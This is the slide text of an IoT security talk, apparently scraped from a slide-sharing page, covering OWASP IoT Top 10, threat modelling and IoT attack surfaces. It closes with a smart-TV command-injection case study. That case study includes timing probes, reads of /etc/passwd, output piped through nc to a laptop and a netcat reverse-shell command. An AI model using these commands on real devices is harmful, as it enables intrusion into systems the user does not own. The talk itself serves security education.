Upskilling the Evolving Workforce with Digital Fluency for Tomorrow's Challen...
 
How the World's Leading Independent Automotive Distributor is Reinventing Its...
How the World's Leading Independent Automotive Distributor is Reinventing Its...How the World's Leading Independent Automotive Distributor is Reinventing Its...
How the World's Leading Independent Automotive Distributor is Reinventing Its...
 
The Importance of Cybersecurity for Digital Transformation
The Importance of Cybersecurity for Digital TransformationThe Importance of Cybersecurity for Digital Transformation
The Importance of Cybersecurity for Digital Transformation
 
Architecting CX Measurement Frameworks and Ensuring CX Metrics are fit for Pu...
Architecting CX Measurement Frameworks and Ensuring CX Metrics are fit for Pu...Architecting CX Measurement Frameworks and Ensuring CX Metrics are fit for Pu...
Architecting CX Measurement Frameworks and Ensuring CX Metrics are fit for Pu...
 
Understanding GenAI/LLM and What is Google Offering - Felix Goh
Understanding GenAI/LLM and What is Google Offering - Felix GohUnderstanding GenAI/LLM and What is Google Offering - Felix Goh
Understanding GenAI/LLM and What is Google Offering - Felix Goh
 
Digital Product-Centric Enterprise and Enterprise Architecture - Tan Eng Tsze
Digital Product-Centric Enterprise and Enterprise Architecture - Tan Eng TszeDigital Product-Centric Enterprise and Enterprise Architecture - Tan Eng Tsze
Digital Product-Centric Enterprise and Enterprise Architecture - Tan Eng Tsze
 
Emerging & Future Technology - How to Prepare for the Next 10 Years of Radica...
Emerging & Future Technology - How to Prepare for the Next 10 Years of Radica...Emerging & Future Technology - How to Prepare for the Next 10 Years of Radica...
Emerging & Future Technology - How to Prepare for the Next 10 Years of Radica...
 
Beyond the Hype: What Generative AI Means for the Future of Work - Damien Cum...
Beyond the Hype: What Generative AI Means for the Future of Work - Damien Cum...Beyond the Hype: What Generative AI Means for the Future of Work - Damien Cum...
Beyond the Hype: What Generative AI Means for the Future of Work - Damien Cum...
 
Supply Chain Security for Containerised Workloads - Lee Chuk Munn
Supply Chain Security for Containerised Workloads - Lee Chuk MunnSupply Chain Security for Containerised Workloads - Lee Chuk Munn
Supply Chain Security for Containerised Workloads - Lee Chuk Munn
 
Future of Learning - Yap Aye Wee.pdf
Future of Learning - Yap Aye Wee.pdfFuture of Learning - Yap Aye Wee.pdf
Future of Learning - Yap Aye Wee.pdf
 
Future of Learning - Khoong Chan Meng
Future of Learning - Khoong Chan MengFuture of Learning - Khoong Chan Meng
Future of Learning - Khoong Chan Meng
 
Site Reliability Engineer (SRE), We Keep The Lights On 24/7
Site Reliability Engineer (SRE), We Keep The Lights On 24/7Site Reliability Engineer (SRE), We Keep The Lights On 24/7
Site Reliability Engineer (SRE), We Keep The Lights On 24/7
 
Product Management in The Trenches for a Cloud Service
Product Management in The Trenches for a Cloud ServiceProduct Management in The Trenches for a Cloud Service
Product Management in The Trenches for a Cloud Service
 
Overview of Data and Analytics Essentials and Foundations
Overview of Data and Analytics Essentials and FoundationsOverview of Data and Analytics Essentials and Foundations
Overview of Data and Analytics Essentials and Foundations
 
Predictive Analytics
Predictive AnalyticsPredictive Analytics
Predictive Analytics
 
Feature Engineering for IoT
Feature Engineering for IoTFeature Engineering for IoT
Feature Engineering for IoT
 
Master of Technology in Software Engineering
Master of Technology in Software EngineeringMaster of Technology in Software Engineering
Master of Technology in Software Engineering
 
Master of Technology in Enterprise Business Analytics
Master of Technology in Enterprise Business AnalyticsMaster of Technology in Enterprise Business Analytics
Master of Technology in Enterprise Business Analytics
 
Diagnosing Complex Problems Using System Archetypes
Diagnosing Complex Problems Using System ArchetypesDiagnosing Complex Problems Using System Archetypes
Diagnosing Complex Problems Using System Archetypes
 

Kürzlich hochgeladen

Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 

Kürzlich hochgeladen (20)

Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 

Breaking Down IoT Security Risks

  • 1. Cecil Su, Technology Risk Advisory, BDO Advisory Singapore IOT – BREAKING BAD
  • 2. #WHOAMI § Mission: To promote cybersecurity at large § Moonlighting as an Open Web Application Security Project (OWASP) Evangelist § Secretary for the Association of Information Security Professional (AiSP) § Advisor for the Singapore Honeynet Project § OWASP Global Education Committee (GEC) alumni member § Co-authored the OWASP Testing Guides v3.0 and v4.0 § Co-authored the WASC TC v2.0 § Volunteer Teacher @Hacking Lab (https://www.hacking-lab.com) § Judge for the CSA Cybersecurity Awards 2018/2019 and WorldSkills Competition (Cybersecurity) 2018/2019
  • 3. OVERVIEW • Motivation • Challenge with IoT • Security & Privacy Risks with IoT • OWASP IoT Top 10 • Threat Modelling IoT • Attacking the IoT Stack • Sample Case Study
  • 4. I O T What is IoT? “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”
  • 5. WHAT IS IOT? o Belkin Wemo o Nespresso Prodigio o Nest o Phillips Hue o Garmin Forerunner o Fitbit o Whiting Blood Pressure Monitor o Meat Thermometers o Weather Stations o Ring doorbell o IP Cameras o Amazon Dash Buttons o Amazon Echo (Alexa) o IP Phones o Pool Pumps o Door Locks o Video Game Consoles o Alarm Systems
  • 6. MOTIVATION • IoT Security spending is rapidly increasing • IoT introduces an increased number of security threats • IoT security happens on 4 different layers • Increasing automation of IoT security tasks • Cyberespionage groups and petty criminals are the most common IoT attackers
  • 7. IOT SECURITY HAPPENS ON 4 DIFFERENT LAYERS Device, Communications, Cloud & Lifecycle Management Source: IoT Analytics
  • 8. IOT IS MORE THAN CONSUMER Hardware hacking “Junk hacking” “Stunt hacking”
  • 9. IOT BEYOND THE HYPE Sectorial/Municipal IoT o Smart cities o Smart grid Industrial IoT o Connected factories o Agriculture o Logistics Medical IoT o Smart hospitals o Electronic medical records
  • 10. IOT EXPANDS SECURITY NEEDS IoT CONNECTIVITY Converged, Managed Network Resilience at Scale Security Application Enablement Distributed Intelligence Increased Attack Surface Threat Diversity Impact and Risk Remediation Protocols Compliance and Regulation
  • 11. SECURITY AND PRIVACY RISKS WITH IOT Heavy startup presence in the field creates security risks o Devices are often crowdfunded or created by new companies who dedicate their limited resources to functionality over security o Recent Hewlett Packard study found that 100% of the home security IoT devices they studied had significant security vulnerabilities No governing body or industry standards for IoT security o Devices are vulnerable to external threats (hackers, ransomware, etc.) and internal mishandling/errors by legitimate custodians of the data Even people who have not purchased an IoT device may be contributing data to it unknowingly o August Smart Locks o Amazon Echo
  • 12. DATA PRIVACY RISKS Business, employee, and client information could be: • Destroyed • Altered • Stolen and exposed • Held for ransom Understand IoT device data collection policies: • What information is gathered? • How long is the data kept? • What is the data used for (marketing research, etc.)?
  • 13. THE POWER OF IOT • Big data provide analytics • Business process optimizations • Multiple concurrent access
  • 14. WHY IT LOOKS SO BAD Breakers have a long history and robust tools o Automated network attack tools o Exploits for most segments of IoT stack o Physical access and hardware hacking Builders are still searching for o Secure toolkits o Proven methodologies o Successful models Result: o Builders cobble together components o Build very fragile full stack solutions o No visibility into security or attack surface o Attackers have a field day
  • 15. IOT SEARCH ENGINES Tool Link • Internet of Things Scanner https://iotscanner.bullguard.com/ • Shodan https://www.shodan.io/ • Thingful https://www.thingful.net/ • ZoomEye https://www.zoomeye.org/
  • 16. MISERABLE TRACK RECORD THUS FAR Luckily most tests are of consumer IoT http://www8.hp.com/h20195/V2/GetPDF.aspx/4AA5-4759ENW.pdf Testing industrial, sectorial, and other IoT is much trickier Most have heterogeneous brownfield deployments Testers can’t just pop down to NTUC Fairprice to get access to these deployments SecuringSmartCities.org has done some testing If history is a guide though things probably are not good
  • 17. WHY THE CONCERN ABOUT IOT SECURITY?
  • 18. OWASP IOT PROJECT An overall IoT security effort o Attack surfaces (present) o Vulnerability lists (working) o Reference solutions (coming) Aggregates community resources Guidance for manufacturers, developers and consumers IoT specific security principles IoT framework assessment
  • 19. OWASP IOT TOP 10 (CIRCA 2014) Category IoT Security Consideration Recommendations I1: Insecure Web Interface •Ensure that any web interface coding is written to prevent the use of weak passwords … When building a web interface consider implementing lessons learned from web application security. Employ a framework that utilizes security … I2: Insufficient Authentication/Authorization •Ensure that applications are written to require strong passwords where authentication is needed … Refer to the OWASP Authentication Cheat Sheet I3: Insecure Network Services •Ensure applications that use network services don't respond poorly to buffer overflow, fuzzing … Try to utilize tested, proven, networking stacks and interfaces that handle exceptions gracefully... I4: Lack of Transport Encryption •Ensure all applications are written to make use of encrypted communication between devices… Utilize encrypted protocols wherever possible to protect all data in transit… I5: Privacy Concerns •Ensure only the minimal amount of personal information is collected from consumers … Data can present unintended privacy concerns when aggregated… I6: Insecure Cloud Interface •Ensure all cloud interfaces are reviewed for security vulnerabilities (e.g. API interfaces and cloud-based web interfaces) … Cloud security presents unique security considerations, as well as countermeasures. Be sure to consult your cloud provider about options for security mechanisms… I7: Insecure Mobile Interface •Ensure that any mobile application coding is written to disallows weak passwords … Mobile interfaces to IoT ecosystems require targeted security. Consult the OWASP Mobile … I8: Insufficient Security Configurability •Ensure applications are written to include password security options (e.g. Enabling 20 character passwords or enabling two-factor authentication)… Security can be a value proposition. Design should take into consideration a sliding scale of security requirements… I9: Insecure Software/Firmware •Ensure all applications are written to include update capability and can be updated quickly … Many IoT deployments are either brownfield and/or have an extremely long deployment cycle... I10: Poor Physical Security •Ensure applications are written to utilize a minimal number of physical external ports (e.g. USB ports) on the device… Plan on having IoT edge devices fall into malicious hands...
  • 20. OWASP IOT TOP 10: 2018 Source: https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project
  • 21. PRINCIPLES OF IOT SECURITY • Assume a hostile edge • Test for scale • Internet of lies • Exploit autonomy • Expect isolation • Protect uniformly • Encryption is tricky • System hardening • Limit what you can • Lifecycle support • Data in aggregate is unpredictable • Plan for the worst • The long haul • Attackers target weakness • Transitive ownership • N:N Authentication
  • 22. FRAMEWORK ASSESSMENT • Based on a prototypical IoT deployment model • Designed like a checklist or benchmark
  • 23. ATTACKERS XYZ Entertainment has a lot of intellectual property that I can sell on the black market. I’m going to figure out how to break in via the IoT devices used. • Target identified first • ONLY THEN is the attack considered • More effort spent planning and executing • Usually targeting larger organisations (may not necessarily be true now) Opportunistic Attack I know how to compromise an embedded device with a known vulnerability. I’m going to scan the Internet to find unpatched devices and see whether I can access some valuable data and inject malicious code to infect visitors with the weaponized device. • Exploit and vulnerability identified first • Target doesn't matter, just needs to be vulnerable to exploit • Low-hanging fruit • Smaller organisations usually fall victim (may not necessarily be true now) Targeted Attack
  • 25. STATE OF IOT SECURITY What we often see in IoT implementations • Security maturity about a decade behind o Weak/default credentials o Replay attacks o Lack of or weak encryption • Often difficult or impossible to patch • Very large ecosystem o Many different connectors, standards, platforms, frameworks, etc. • Security through obscurity • Many embedded developer assume their code will operate in a trusted environment
  • 26. ATTACKING IOT DEVICES (IOT STACK) • Device • User/Management Interfaces o Mobile Applications o Web o Thick Clients • Hardware Input and Output • Hardware sensors • Local/Global Network • Wireless (BLE, ZigBee, Wifi ,etc.,.) • Cloud Services/API’s
  • 27. ATTACKING IOT DEVICES (PORTS) • UART • JTAG • SPI • I2C • USB • Ethernet • Etc
  • 28. ATTACKING IOT DEVICES (RESEARCH TARGET) • Identify hardware components • Download Firmware • Download SDK’s • Public datasheets (alldatasheet.com) o FCC ID • Identify Ports (UART, JTAG, etc • Shodan for target discovery • Threat modelling
  • 29. ATTACKING IOT DEVICES (COMMON ATTACK TECH) • Reverse engineering firmware o Hidden secrets (Passwords, Certs, API Keys, etc) o Backdoors, Debug or Administrative features • Radio Attacks (Sniff, Replay, MiTM) • Monitor network traffic • Port scan target/Network attacks • Direct access to device memory
  • 30. ATTACKING IOT (SKILLS) • Web Application Security Testing • Mobile Application Security Testing • Wireless Testing • Network Penetration Testing • Reverse Engineering • Electronics • Strong appetite and aptitude for learning • and more…
  • 32. FIVE-STEPS WITH THREAT MODELLING Source: ARM Community, Threat Models & Security Analyses Assets that may need protection: • Firmware • Certificates and device-unique keys • Log-in credentials (user or admin) • System configurations (to ensure your IP cannot be compromised or control taken away) • Event logs • Voice recordings • Network communication • Device resources (for example: microphone array and speakers, computing power and battery, network bandwidth, debug interface, storage) Identify potential adversaries: • Remote software attacker • Network attacker • Malicious insider attacker • Advanced hardware attacker -
  • 33. STRIDE THREAT MODEL Source: ARM Community, Threat Models & Security Analyses
  • 34. ATTACK SURFACES Source: ARM Community, Threat Models & Security Analyses
  • 35. ASSETS VERSUS THREATS Source: ARM Community, Threat Models & Security Analyses
  • 36. THE SEVERITY OF AN ATTACK Source: ARM Community, Threat Models & Security Analyses
  • 37. SECURITY OBJECTIVES – ADDRESSING THREATS Source: ARM Community, Threat Models & Security Analyses
  • 38. DEFINE SECURITY REQUIREMENTS Source: ARM Community, Threat Models & Security Analyses
  • 39. CONSOLIDATE INTO A THREAT SUMMARY TABLE
  • 40. SO WHERE DOES THAT LEAVE US WITH TM? Take all the assets Associate threat types with each asset Voila! List of things we need to worry about
  • 41. THE VULNERABILITY ON THE SMART TV • Looking for a way in… • Try arbitrary command : `sleep 5 `
  • 42. THE FIELDWORK • The menu froze for a while. • Thinking that it might have backtick characters that was injected. Maybe the TV did not expect them and threw an error which prevented it from loading. • Typed in “television `sleep 0`” and tried it again. It loaded instantly. • Decided to measure the time. It turned out that it always took the television set three times longer than the input number to become responsive, as shown below: o sleep(2) - 6 seconds o sleep(3) - 9 seconds o sleep(5) - 15 seconds
  • 43. RUNNING THE COMMANDS • Test cases Command Explanation Chars Succeeded `which nc && sleep 2` which is a linux command that returns the path to a program if it exists. && sleep 2 would freeze the menu for 3*2 seconds if the which function found nc on the TV set. 19 Yes `which ssh && sleep 2` Wanted to see if ssh was installed. 20 No `which wget && sleep 2` But it had wget 21 Yes `cat /etc/passwd && sleep 2` Wanted to see if /etc/passwd was readable. It was, and it would have been a big surprise if it wasn't 26 Yes `cat /etc/shadow && sleep 2` This one is interesting. When there are root privileges the /etc/shadow file is readable. I wanted to test if I am root but the file wasn’t readable. 26 No `ls /etc/shadow && sleep 2` This is the explanation why the shadow file couldn’t be opened. It just didn’t exist. 25 No
  • 44. GETTING SHELL ACCESS • Plugged the ethernet cable and connected to the laptop • Ran “ipconfig” to determine the IP of the laptop
  • 45. GETTING SHELL ACCESS • A reverse shell would be handy because it would bypass any possible firewall rules blocking incoming connections. • But before thinking about how to get one in less than 29 characters it is good to learn a little bit more about the system.
  • 46. GETTING SHELL ACCESS • It was discovered that there is nc installed on the TV set, so the next action is to pipe the output of certain commands through nc back to the laptop. • The first command “id” was executed, which would indicate whether or not root privileges is defaulted on the Smart TV set.
  • 47. GETTING SHELL ACCESS • The next thing was to obtain a directory listing of / with `ls -la /|nc 169.254.56.216 5` • Still it had no shell to issue proper commands. All of them were more or less length restricted and not too useful.
  • 48. GETTING SHELL ACCESS • Since the version of nc that was installed on the TV allowed the -e flag it was easy to get a reverse shell with: `nc 169.254.213.210 5 -e sh` • Perfect. There is now a proper shell to work with. • There were multiple possibilities to mess the TV in a visible way.
  • 49. GETTING SHELL ACCESS • With this possibility, the avenues available are such as changing the logo that’s being shown during the boot up process, or changing the apps icons.
  • 50. SOME SMART TV VULNERABILITIES Some recent Smart TV vulnerabilities that were discovered: • CVE-2018-16595: Stack Buffer Overflow memory corruption vulnerability that could lead to app crash. • CVE-2018-16594: Directory Traversal where an attacker can upload an arbitrary file with a crafted file name (e.g.: ../../) that can then traverse the whole filesystem. • CVE-2018-16593: Command Injection vulnerability can run arbitrary commands on the system, which can result in complete remote code execution with root privilege.
  • 51. FINAL THOUGHTS Privacy in realms of big data is a problem No real technical solution to this one Regulation is probably coming A few organisations (ie., FTC) set to release guidelines next year Consumers may eschew security but business would not Security can be a differentiator
  • 52. IN CONCLUSION Source: Singapore Cyber Landscape 2018 Report, page 49 https://www.csa.gov.sg/~/media/csa/documents/publications/csasinga porecyberlandscape2018.pdf Ref#19: Boddy, Sara and Shattuck, Justin. “The Hunt for IoT: The Growth and Evolution of Thingbots Ensures Chaos,” F5 Labs – Threat Analysis Report, 13 March 2018, https://www.f5.com/labs/articles/threat-intelligence/the-hunt-for-iot- the-growth-andevolution-of-thingbots-ensures-chaos
  • 53. THANK YOU CECIL SU, DIRECTOR OF TECHNOLOGY RISK ADVISORY CYBERSECURITY & DIGITAL FORENSICS INCIDENT RESPONSE BDO ADVISORY (SINGAPORE) TEL : +65 6828 9118 DID : +65 6829 9628 EMAIL : CECILSU@BDO.COM.SG